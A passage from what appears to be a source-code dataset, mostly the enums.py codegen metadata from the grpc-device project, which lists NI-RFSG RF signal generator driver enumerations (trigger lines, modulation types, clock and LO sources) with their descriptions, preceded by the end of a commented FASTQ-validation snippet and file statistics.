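#     b"!''*((((**",    # quality: printable ASCII, '!' (33) to '~' (126)
# ]
#
# sequence_symbols = {ord(s) for s in "ACTGN."}
# quality_symbols = set(range(ord("!"), ord("~") + 1))
#
# valid = (
#     record[0][0] == ord("@")
#     and all(c < 128 for c in record[0])
#     and all(c in sequence_symbols for c in record[1])
#     and record[2][0] == ord("+")
#     and all(c in quality_symbols for c in record[3])
#     and len(record[1]) == len(record[3])
# )
# print(valid)  # True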
| 35.804598 | 90 | 0.582665 | 364 | 3,115 | 4.684066 | 0.233516 | 0.045161 | 0.025806 | 0.040469 | 0.090323 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0.013139 | 0.340289 | 3,115 | 86 | 91 | 36.22093 | 0.816545 | 0.041091 | 0 | 0.082192 | 0 | 0 | 0.004025 | 0 | 0 | 0 | 0 | 0.011628 | 0 | 1 | 0.123288 | false | 0 | 0 | 0 | 0.30137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
15898a995b5971187abab36d048bb1449cd025a4 | 64,499 | py | Python | source/codegen/metadata/nirfsg/enums.py | tdunkle/grpc-device | 2c784476327595fdeae06d6a3fc7aaf6daac597e | [
"MIT"
] | 24 | 2021-03-25T18:37:59.000Z | 2022-03-03T16:33:56.000Z | source/codegen/metadata/nirfsg/enums.py | tdunkle/grpc-device | 2c784476327595fdeae06d6a3fc7aaf6daac597e | [
"MIT"
] | 129 | 2021-04-03T15:16:04.000Z | 2022-03-25T21:48:18.000Z | source/codegen/metadata/nirfsg/enums.py | tdunkle/grpc-device | 2c784476327595fdeae06d6a3fc7aaf6daac597e | [
"MIT"
] | 24 | 2021-03-31T12:36:14.000Z | 2022-02-25T03:01:25.000Z | enums = {
'AmpPath': {
'values': [
{
'documentation': {
'description': ' Sets the amplification path to use the high power path. \n'
},
'name': 'HIGH_POWER',
'value': 16000
},
{
'documentation': {
'description': ' Sets the amplification path to use the low harmonic path. \n'
},
'name': 'LOW_HARMONIC',
'value': 16001
}
]
},
'AnalogModulationFMBand': {
'values': [
{
'documentation': {
'description': ' Specifies narrowband frequency modulation.\n'
},
'name': 'NARROWBAND',
'value': 17000
},
{
'documentation': {
'description': ' Specifies wideband frequency modulation.\n'
},
'name': 'WIDEBAND',
'value': 17001
}
]
},
'AnalogModulationFMNarrowbandIntegrator': {
'values': [
{
'documentation': {
'description': ' Specifies a range from 100 Hz to 1 kHz.\n'
},
'name': '100_HZ_TO_1_KHZ',
'value': 18000
},
{
'documentation': {
'description': ' Specifies a range from 1 kHz to 10 kHz.\n'
},
'name': '1_KHZ_TO_10_KHZ',
'value': 18001
},
{
'documentation': {
'description': ' Specifies a range from 10 kHz to 100 kHz.\n'
},
'name': '10_KHZ_TO_100_KHZ',
'value': 18002
}
]
},
'AnalogModulationPMMode': {
'values': [
{
'documentation': {
'description': ' Specifies high deviation. High deviation comes at the expense of a higher phase noise.\n'
},
'name': 'HIGH_DEVIATION',
'value': 19000
},
{
'documentation': {
'description': ' Specifies low phase noise. Low phase noise comes at the expense of a lower maximum deviation.\n'
},
'name': 'LOW_PHASE_NOISE',
'value': 19001
}
]
},
'AnalogModulationType': {
'values': [
{
'documentation': {
'description': ' Disables analog modulation.\n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' Specifies that the analog modulation type is FM.\n'
},
'name': 'FM',
'value': 2000
},
{
'documentation': {
'description': ' Specifies that the analog modulation type is PM.\n'
},
'name': 'PM',
'value': 2001
},
{
'documentation': {
'description': ' Specifies that the analog modulation type is AM.\n'
},
'name': 'AM',
'value': 2002
}
]
},
'AnalogModulationWaveformType': {
'values': [
{
'documentation': {
'description': ' Specifies that the analog modulation waveform type is sine.\n'
},
'name': 'SINE',
'value': 3000
},
{
'documentation': {
'description': ' Specifies that the analog modulation waveform type is square.\n'
},
'name': 'SQUARE',
'value': 3001
},
{
'documentation': {
'description': ' Specifies that the analog modulation waveform type is triangle.\n'
},
'name': 'TRIANGLE',
'value': 3002
}
]
},
'AnySignalOutputTerm': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' The signal is not exported.\n'
},
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'documentation': {
'description': ' PFI 0 on the front panel SMB connector. For the PXIe-5841 with PXIe-5655, the signal is exported to the PXIe-5841 PFI 0.\n'
},
'name': 'PFI0',
'value': 'PFI0'
},
{
'documentation': {
'description': ' PFI 1 on the front panel SMB connector.\n'
},
'name': 'PFI1',
'value': 'PFI1'
},
{
'documentation': {
'description': ' PFI 4 on the front panel DDC connector.\n'
},
'name': 'PFI4',
'value': 'PFI4'
},
{
'documentation': {
'description': ' PFI 5 on the front panel DDC connector.\n'
},
'name': 'PFI5',
'value': 'PFI5'
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXIe DStar C trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841.\n'
},
'name': 'PXIE_DSTARC',
'value': 'PXIe_DStarC'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_OUT',
'value': 'TrigOut'
}
]
},
'ArbFilterType': {
'values': [
{
'documentation': {
'description': ' None'
},
'name': 'NONE',
'value': 10000
},
{
'documentation': {
'description': ' Applies a root-raised cosine filter to the data with the alpha value specified with the NIRFSG_ATTR_ARB_FILTER_ROOT_RAISED_COSINE_ALPHA attribute. '
},
'name': 'ROOT_RAISED_COSINE',
'value': 10001
},
{
'documentation': {
'description': ' Applies a raised cosine filter to the data with the alpha value specified with the NIRFSG_ATTR_ARB_FILTER_RAISED_COSINE_ALPHA attribute. '
},
'name': 'RAISED_COSINE',
'value': 10002
}
]
},
'ArbOnboardSampleClockMode': {
'values': [
{
'documentation': {
        'description': ' Specifies that the clock mode is high resolution. High resolution sampling is when a sample rate is generated by a high resolution clock source.\n'
},
'name': 'HIGH_RESOLUTION',
'value': 6000
},
{
'documentation': {
'description': ' Specifies that the clock mode is divide down. Divide down sampling is when sample rates are generated by dividing the source frequency.\n'
},
'name': 'DIVIDE_DOWN',
'value': 6001
}
]
},
'ArbSampleClockSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Use the AWG module onboard clock as the clock source.\n'
},
'name': 'ONBOARD_CLOCK',
'value': 'OnboardClock'
},
{
'documentation': {
'description': ' Use the external clock as the clock source.\n'
},
'name': 'CLK_IN',
'value': 'ClkIn'
}
]
},
'ConfigListTrigOutputTerm': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' The signal is not exported.\n'
},
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'documentation': {
'description': ' PFI 0 on the front panel SMB connector. For the PXIe-5841 with PXIe-5655, the signal is exported to the PXIe-5841 PFI 0.\n'
},
'name': 'PFI0',
'value': 'PFI0'
},
{
'documentation': {
'description': ' PFI 1 on the front panel SMB connector.\n'
},
'name': 'PFI1',
'value': 'PFI1'
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXIe DStar C trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841.\n'
},
'name': 'PXIE_DSTARC',
'value': 'PXIe_DStarC'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_OUT',
'value': 'TrigOut'
}
]
},
'ConfigListTrigSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' PFI 0 on the front panel SMB connector.\n'
},
'name': 'PFI0',
'value': 'PFI0'
},
{
'documentation': {
'description': ' PFI 1 on the front panel SMB connector.\n'
},
'name': 'PFI1',
'value': 'PFI1'
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXI trigger line 7.\n'
},
'name': 'PXI_TRIG7',
'value': 'PXI_Trig7'
},
{
'documentation': {
        'description': ' PXIe DStar B trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841.\n'
},
'name': 'PXIE_DSTARB',
'value': 'PXIe_DStarB'
},
{
'documentation': {
'description': ' Marker Event 0.\n'
},
'name': 'MARKER0_EVENT',
'value': 'Marker0Event'
},
{
'documentation': {
'description': ' Marker Event 1.\n'
},
'name': 'MARKER1_EVENT',
'value': 'Marker1Event'
},
{
'documentation': {
'description': ' Marker Event 2.\n'
},
'name': 'MARKER2_EVENT',
'value': 'Marker2Event'
},
{
'documentation': {
'description': ' Marker Event 3.\n'
},
'name': 'MARKER3_EVENT',
'value': 'Marker3Event'
},
{
'documentation': {
'description': ' Timer Event.\n'
},
'name': 'TIMER_EVENT',
'value': 'TimerEvent'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_IN',
'value': 'TrigIn'
}
]
},
'ConfigListTriggerDigEdgeEdge': {
'values': [
{
'documentation': {
'description': ' Specifies the rising edge as the active edge. The rising edge occurs when the signal transitions from low level to high level.\n'
},
'name': 'RISING_EDGE',
'value': 0
}
]
},
'ConfigSettledEventOutputTerm': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' The signal is not exported.\n'
},
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'documentation': {
'description': ' PXI trigger line 0.\n'
},
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'documentation': {
'description': ' PXI trigger line 1.\n'
},
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'documentation': {
'description': ' PXI trigger line 2.\n'
},
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'documentation': {
'description': ' PXI trigger line 3.\n'
},
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'documentation': {
'description': ' PXI trigger line 4.\n'
},
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'documentation': {
'description': ' PXI trigger line 5.\n'
},
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'documentation': {
'description': ' PXI trigger line 6.\n'
},
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'documentation': {
'description': ' PXIe DStar C trigger line. This value is valid on only the PXIe-5820/5830/5831/5840/5841.\n'
},
'name': 'PXIE_DSTARC',
'value': 'PXIe_DStarC'
},
{
'documentation': {
'description': ' TRIG IN/OUT terminal.\n'
},
'name': 'TRIG_OUT',
'value': 'TrigOut'
}
]
},
'ConfigurationListRepeat': {
'values': [
{
'documentation': {
'description': ' NI-RFSG runs the configuration list continuously.\n'
},
'name': 'CONFIGURATION_LIST_REPEAT_CONTINUOUS',
'value': 0
},
{
'documentation': {
'description': ' NI-RFSG runs the configuration list only once.'
},
'name': 'CONFIGURATION_LIST_REPEAT_SINGLE',
'value': 1
}
]
},
'DeembeddingType': {
'values': [
{
'documentation': {
'description': ' De-embedding is not applied to the measurement. '
},
'name': 'NONE',
'value': 25000
},
{
'documentation': {
'description': ' De-embeds the measurement using only the gain term.'
},
'name': 'SCALAR',
'value': 25001
},
{
'documentation': {
'description': ' De-embeds the measurement using the gain term and the reflection term.'
},
'name': 'VECTOR',
'value': 25002
}
]
},
'DigitalEdgeConfigurationListStepTriggerSource': {
'generate-mappings': True,
'values': [
{
'name': 'PFI0',
'value': 'PFI0'
},
{
'name': 'PFI1',
'value': 'PFI1'
},
{
'name': 'PFI2',
'value': 'PFI2'
},
{
'name': 'PFI3',
'value': 'PFI3'
},
{
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'name': 'PXI_TRIG7',
'value': 'PXI_Trig7'
},
{
'name': 'PXI_STAR',
'value': 'PXI_STAR'
},
{
'name': 'MARKER0_EVENT',
'value': 'Marker0Event'
},
{
'name': 'MARKER1_EVENT',
'value': 'Marker1Event'
},
{
'name': 'MARKER2_EVENT',
'value': 'Marker2Event'
},
{
'name': 'MARKER3_EVENT',
'value': 'Marker3Event'
},
{
'name': 'TIMER_EVENT',
'value': 'TimerEvent'
},
{
'name': 'TRIG_IN',
'value': 'TrigIn'
}
]
},
'DigitalEdgeEdge': {
'values': [
{
'documentation': {
'description': ' Occurs when the signal transitions from low level to high level. \n'
},
'name': 'RISING_EDGE',
'value': 0
},
{
'documentation': {
'description': ' Occurs when the signal transitions from high level to low level. \n'
},
'name': 'FALLING_EDGE',
'value': 1
}
]
},
'DigitalEdgeScriptTriggerIdentifier': {
'generate-mappings': True,
'values': [
{
'name': 'SCRIPT_TRIGGER0',
'value': 'scriptTrigger0'
},
{
'name': 'SCRIPT_TRIGGER1',
'value': 'scriptTrigger1'
},
{
'name': 'SCRIPT_TRIGGER2',
'value': 'scriptTrigger2'
},
{
'name': 'SCRIPT_TRIGGER3',
'value': 'scriptTrigger3'
}
]
},
'DigitalLevelActiveLevel': {
'values': [
{
'documentation': {
'description': ' Trigger when the digital trigger signal is high. \n'
},
'name': 'ACTIVE_HIGH',
'value': 9000
},
{
'documentation': {
'description': ' Trigger when the digital trigger signal is low. \n'
},
'name': 'ACTIVE_LOW',
'value': 9001
}
]
},
'DigitalModulationType': {
'values': [
{
'documentation': {
'description': ' Disables digital modulation.\n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' Specifies that the digital modulation type is frequency-shift keying (FSK).\n'
},
'name': 'FSK',
'value': 4000
},
{
'documentation': {
'description': ' Specifies that the digital modulation type is on-off keying (OOK).\n'
},
'name': 'OOK',
'value': 4001
},
{
'documentation': {
'description': ' Specifies that the digital modulation type is PSK.\n'
},
'name': 'PSK',
'value': 4002
}
]
},
'DigitalModulationWaveformType': {
'values': [
{
'documentation': {
'description': ' Specifies that the digital modulation waveform type is pseudorandom bit sequence (PRBS).\n'
},
'name': 'PRBS',
'value': 5000
},
{
'documentation': {
'description': ' Specifies that the digital modulation waveform type is user defined. To specify the user-defined waveform, call the niRFSG_ConfigureDigitalModulationUserDefinedWaveform function.\n'
},
'name': 'USER_DEFINED',
'value': 5001
}
]
},
'EnableValues': {
'values': [
{
'documentation': {
'description': ' Enabled'
},
'name': 'ENABLE',
'value': 1
},
{
'documentation': {
'description': ' Disabled'
},
'name': 'DISABLE',
'value': 0
}
]
},
'FrequencySettlingUnits': {
'values': [
{
'documentation': {
'description': ' Specifies the value in Frequency Settling is the time to wait after the frequency PLL locks.\n'
},
'name': 'TIME_AFTER_LOCK',
'value': 12000
},
{
'documentation': {
'description': ' Specifies the value in Frequency Settling is the time to wait after all writes to change the frequency occur.\n'
},
'name': 'TIME_AFTER_IO',
'value': 12001
},
{
'documentation': {
'description': ' Specifies the value in Frequency Settling is the minimum frequency accuracy when settling completes. Units are in parts per million (PPM or 1E-6).\n'
},
'name': 'PPM',
'value': 12002
}
]
},
'GenerationMode': {
'values': [
{
'documentation': {
'description': ' Configures the RF signal generator to generate a CW signal. \n'
},
'name': 'CW',
'value': 1000
},
{
'documentation': {
'description': ' Configures the RF signal generator to generate the arbitrary waveform specified by the NIRFSG_ATTR_ARB_SELECTED_WAVEFORM attribute. \n'
},
'name': 'ARB_WAVEFORM',
'value': 1001
},
{
'documentation': {
'description': ' Configures the RF signal generator to generate arbitrary waveforms as directed by the NIRFSG_ATTR_SELECTED_SCRIPT attribute. \n'
},
'name': 'SCRIPT',
'value': 1002
}
]
},
'IqOffsetUnits': {
'values': [
{
'name': 'PERCENT',
'value': 11000
},
{
'name': 'VOLTS',
'value': 11001
}
]
},
'IqOutPortTermConfig': {
'values': [
{
'documentation': {
'description': ' Sets the terminal configuration to differential. \n'
},
'name': 'DIFFERENTIAL',
'value': 15000
},
{
'documentation': {
'description': ' Sets the terminal configuration to single-ended. \n'
},
'name': 'SINGLE_ENDED',
'value': 15001
}
]
},
'LinearInterpolationFormat': {
'values': [
{
'name': 'REAL_AND_IMAGINARY',
'value': 26000
},
{
'name': 'MAGNITUDE_AND_PHASE',
'value': 26001
},
{
'name': 'MAGNITUDE_DB_AND_PHASE',
'value': 26002
}
]
},
'ListStepTriggerType': {
'values': [
{
'documentation': {
'description': ' Generation starts immediately. No trigger is configured. \n'
},
'name': 'NONE',
'value': 0
},
{
'documentation': {
'description': ' The data operation does not start until a digital edge is detected. The source of the digital edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_START_TRIGGER_SOURCE attribute, and the active edge is specified in the NIRFSG_ATTR_DIGITAL_EDGE_START_TRIGGER_EDGE attribute. \n'
},
'name': 'DIGITAL_EDGE',
'value': 1
}
]
},
'LoSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Uses an internal LO as the LO source. If you specify an internal LO source, the LO is generated within the device itself. \n\n PXIe-5840 with PXIe-5653: If the center frequency is greater than or equal to 3.2 GHz, this configuration uses the PXIe-5653 LO source. For frequencies less than 3.2 GHz, this configuration uses the PXIe-5840 internal LO. \n PXIe-5841 with PXIe-5655: This configuration uses the onboard LO of the PXIe-5655. \n'
},
'name': 'ONBOARD',
'value': 'Onboard'
},
{
'documentation': {
'description': ' Uses an external LO as the LO source. Connect a signal to the LO IN connector on the device and use the NIRFSG_ATTR_UPCONVERTER_CENTER_FREQUENCY attribute to specify the LO frequency. \n'
},
'name': 'LO_IN',
'value': 'LO_In'
},
{
'documentation': {
'description': ' Uses the PXIe-5840 internal LO as the LO source. This value is valid on only the PXIe-5840 with PXIe-5653.'
},
'name': 'SECONDARY',
'value': 'Secondary'
},
{
'documentation': {
'description': ' Uses the same internal LO during some RX and TX operations. In this mode, an internal synthesizer is chosen by the driver and the synthesizer signal is switched to both the RF In and RF Out mixers. This value is valid on only the PXIe-5830/5831/5841 with PXIe-5655. \n'
},
'name': 'SG_SA_SHARED',
'value': 'SG_SA_Shared'
},
{
'documentation': {
'description': ' NI-RFSG internally makes the configuration to share the LO between NI-RFSA and NI-RFSG. This value is valid only on the PXIe-5820/5830/5831/5832/5840/5841. \n'
},
'name': 'AUTOMATIC_SG_SA_SHARED',
'value': 'Automatic_SG_SA_Shared'
}
]
},
'LoadOptions': {
'values': [
{
'documentation': {
'description': ' NI-RFSG loads all the configurations to the session.'
},
'name': 'SKIP_NONE',
'value': 0
},
{
'documentation': {
'description': ' NI-RFSG skips loading the waveform configurations to the session.'
},
'name': 'SKIP_WAVEFORMS',
'value': 1
}
]
},
'LoopBandwidth': {
'values': [
{
'documentation': {
'description': ' Specifies that the device uses a narrow loop bandwidth.\n'
},
'name': 'NARROW',
'value': 0
},
{
'documentation': {
'description': ' Specifies that the device uses a medium loop bandwidth.\n'
},
'name': 'MEDIUM',
'value': 1
},
{
'documentation': {
'description': ' Specifies that the device uses a wide loop bandwidth.\n'
},
'name': 'WIDE',
'value': 2
}
]
},
'MarkerEventOutputBehavior': {
'values': [
{
'documentation': {
'description': ' Specifies the Marker Event output behavior as pulse. \n'
},
'name': 'PULSE',
'value': 23000
},
{
'documentation': {
'description': ' Specifies the Marker Event output behavior as toggle. \n'
},
'name': 'TOGGLE',
'value': 23001
}
]
},
'MarkerEventPulseWidthUnits': {
'values': [
{
'documentation': {
'description': ' Specifies the Marker Event pulse width units as seconds. \n'
},
'name': 'SECONDS',
'value': 22000
},
{
'documentation': {
'description': ' Specifies the Marker Event pulse width units as Sample Clock periods. \n'
},
'name': 'SAMPLE_CLOCK_PERIODS',
'value': 22001
}
]
},
'MarkerEventToggleInitialState': {
'values': [
{
'documentation': {
'description': ' Specifies the initial state of the Marker Event toggle behavior as digital low. \n'
},
'name': 'DIGITAL_LOW',
'value': 21000
},
{
'documentation': {
'description': ' Specifies the initial state of the Marker Event toggle behavior as digital high. \n'
},
'name': 'DIGITAL_HIGH',
'value': 21001
}
]
},
'Module': {
'values': [
{
'name': 'PRIMARY_MODULE',
'value': 13000
},
{
'name': 'AWG',
'value': 13001
},
{
'name': 'LO',
'value': 13002
}
]
},
'OutputPort': {
'values': [
{
'documentation': {
'description': ' Enables the RF OUT port. \n'
},
'name': 'RF_OUT',
'value': 14000
},
{
'documentation': {
'description': ' Enables the I/Q OUT port. \n'
},
'name': 'IQ_OUT',
'value': 14001
},
{
'documentation': {
'description': ' Enables the CAL OUT port. \n'
},
'name': 'CAL_OUT',
'value': 14002
},
{
'documentation': {
'description': ' Enables the I connectors of the I/Q OUT port. \n'
},
'name': 'I_ONLY',
'value': 14003
}
]
},
'OutputSignal': {
'generate-mappings': True,
'values': [
{
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'name': 'PFI0',
'value': 'PFI0'
},
{
'name': 'PFI1',
'value': 'PFI1'
},
{
'name': 'PFI4',
'value': 'PFI4'
},
{
'name': 'PFI5',
'value': 'PFI5'
},
{
'name': 'PXI_STAR',
'value': 'PXI_STAR'
},
{
'name': 'PXI_TRIG0',
'value': 'PXI_Trig0'
},
{
'name': 'PXI_TRIG1',
'value': 'PXI_Trig1'
},
{
'name': 'PXI_TRIG2',
'value': 'PXI_Trig2'
},
{
'name': 'PXI_TRIG3',
'value': 'PXI_Trig3'
},
{
'name': 'PXI_TRIG4',
'value': 'PXI_Trig4'
},
{
'name': 'PXI_TRIG5',
'value': 'PXI_Trig5'
},
{
'name': 'PXI_TRIG6',
'value': 'PXI_Trig6'
},
{
'name': 'REF_OUT2',
'value': 'RefOut2'
},
{
'name': 'REF_OUT',
'value': 'RefOut'
},
{
'name': 'TRIG_OUT',
'value': 'TrigOut'
}
]
},
'OverflowErrorReporting': {
'values': [
{
'documentation': {
'description': ' Configures NI-RFSG to return a warning when an OSP overflow occurs.'
},
'name': 'WARNING',
'value': 1301
},
{
'documentation': {
'description': ' Configures NI-RFSG to not return an error or a warning when an OSP overflow occurs.'
},
'name': 'DISABLED',
'value': 1302
}
]
},
'PPAScriptInheritance': {
'values': [
{
'documentation': {
'description': ' Errors out if different values are detected in the script.\n'
},
'name': 'EXACT_MATCH',
'value': 0
},
{
'documentation': {
'description': ' Uses the minimum value found in the script.\n'
},
'name': 'MINIMUM',
'value': 1
},
{
'documentation': {
'description': ' Uses the maximum value found in the script.\n'
},
'name': 'MAXIMUM',
'value': 2
}
]
},
'PXIChassisClk10': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Do not drive the PXI_CLK10 signal.\n'
},
'name': 'NONE',
'value': 'None'
},
{
'documentation': {
'description': ' Use the highly stable oven-controlled onboard Reference Clock to drive the PXI_CLK10 signal. This value is not valid on the PXIe-5672.\n'
},
'name': 'ONBOARD_CLOCK',
'value': 'OnboardClock'
},
{
'documentation': {
'description': ' Use the clock present at the front panel REF IN connector to drive the PXI_CLK10 signal.\n'
},
'name': 'REF_IN',
'value': 'RefIn'
}
]
},
'PhaseContinuity': {
'values': [
{
'documentation': {
'description': ' Auto'
},
'name': 'AUTO',
'value': -1
},
{
'documentation': {
'description': ' Enabled'
},
'name': 'ENABLE',
'value': 1
},
{
'documentation': {
'description': ' Disabled'
},
'name': 'DISABLE',
'value': 0
}
]
},
'PowerLevelType': {
'values': [
{
'documentation': {
'description': ' Specifies that the power level type is average power. Average power indicates the desired power averaged in time. The driver maximizes the dynamic range by scaling the IQ waveform. If you write more than one waveform, NI-RFSG scales each waveform without preserving the power level ratio between the waveforms. This value is not valid for the PXIe-5820. \n'
},
'name': 'AVERAGE_POWER',
'value': 7000
},
{
'documentation': {
'description': ' Specifies that the power level type is peak power. Peak power indicates the maximum power level of the RF signal averaged over one period of the RF carrier signal frequency (the peak envelope power). This setting requires that the magnitude of the IQ waveform must always be less than or equal to one. When using the peak power level type, the power level of the RF signal matches the specified power level at moments when the magnitude of the IQ waveform equals one. If you write more than one waveform, the relative scaling between waveforms is preserved.\n'
},
'name': 'PEAK_POWER',
'value': 7001
}
]
},
'PulseModulationMode': {
'values': [
{
'documentation': {
'description': ' Provides for a more optimal power output match for the device during the off cycle of the pulse mode operation. \n'
},
'name': 'OPTIMAL_MATCH',
'value': 20000
},
{
'documentation': {
'description': ' Allows for the best on/off power ratio of the pulsed signal. \n'
},
'name': 'HIGH_ISOLATION',
'value': 20001
}
]
},
'RefClockOutputTerm': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Do not export the Reference Clock.\n'
},
'name': 'DO_NOT_EXPORT',
'value': ''
},
{
'documentation': {
'description': ' Export the Reference Clock signal to the REF OUT connector of the device.\n'
},
'name': 'REF_OUT',
'value': 'RefOut'
},
{
'documentation': {
'description': ' Export the Reference Clock signal to the REF OUT2 connector of the device, if applicable.\n'
},
'name': 'REF_OUT2',
'value': 'RefOut2'
},
{
'documentation': {
'description': ' Export the Reference Clock signal to the CLK OUT connector of the device.\n'
},
'name': 'CLK_OUT',
'value': 'ClkOut'
}
]
},
'RefClockRate': {
'values': [
{
'name': '10_MHZ',
'value': 10000000
},
{
'name': 'AUTO',
'value': -1
}
]
},
'RefClockSource': {
'generate-mappings': True,
'values': [
{
'documentation': {
'description': ' Uses the onboard Reference Clock as the clock source.\n PXIe-5830/5831—For the PXIe-5830, connect the PXIe-5820 REF IN connector to the PXIe-3621 REF OUT connector. For the PXIe-5831, connect the PXIe-5820 REF IN connector to the PXIe-3622 REF OUT connector. \n PXIe-5831 with PXIe-5653—Connect the PXIe-5820 REF IN connector to the PXIe-3622 REF OUT connector. Connect the PXIe-5653 REF OUT (10 MHz) connector to the PXIe-3622 REF IN connector. \n PXIe-5840 with PXIe-5653—Lock to the PXIe-5653 onboard clock. Connect the REF OUT (10 MHz) connector on the PXIe-5653 to the PXIe-5840 REF IN connector. Configure open NI-RFSA sessions to the device to use NIRFSA_VAL_REF_IN_STR for the PXIe-5840 or NIRFSA_VAL_REF_IN_2_STR for the PXIe-5840 with PXIe-5653. \n PXIe-5841 with PXIe-5655—Lock to the PXIe-5655 onboard clock. Connect the REF OUT connector on the PXIe-5655 to the PXIe-5841 REF IN connector. \n'
},
'name': 'ONBOARD_CLOCK',
'value': 'OnboardClock'
},
{
'documentation': {
'description': ' Use the clock signal present at the front panel RefIn connector as the clock source.\n PXIe-5830/5831—For the PXIe-5830, connect the PXIe-5820 REF IN connector to the PXIe-3621 REF OUT connector. For the PXIe-5831, connect the PXIe-5820 REF IN connector to the PXIe-3622 REF OUT connector. For the PXIe-5830, lock the external signal to the PXIe-3621 REF IN connector. For the PXIe-5831, lock the external signal to the PXIe-3622 REF IN connector. \n PXIe-5831 with PXIe-5653—Connect the PXIe-5820 REF IN connector to the PXIe-3622 REF OUT connector. Connect the PXIe-5653 REF OUT (10 MHz) connector to the PXIe-3622 REF IN connector. Lock the external signal to the PXIe-5653 REF IN connector. PXIe-5840 with PXIe-5653—Lock to the PXIe-5653 onboard clock. Connect the REF OUT (10 MHz) connector on the PXIe-5653 to the PXIe-5840 REF IN connector. \n PXIe-5841 with PXIe-5655—Lock to the signal at the REF IN connector on the associated PXIe-5655. Connect the PXIe-5655 REF OUT connector to the PXIe-5841 REF IN connector. \n'
},
'name': 'REF_IN',
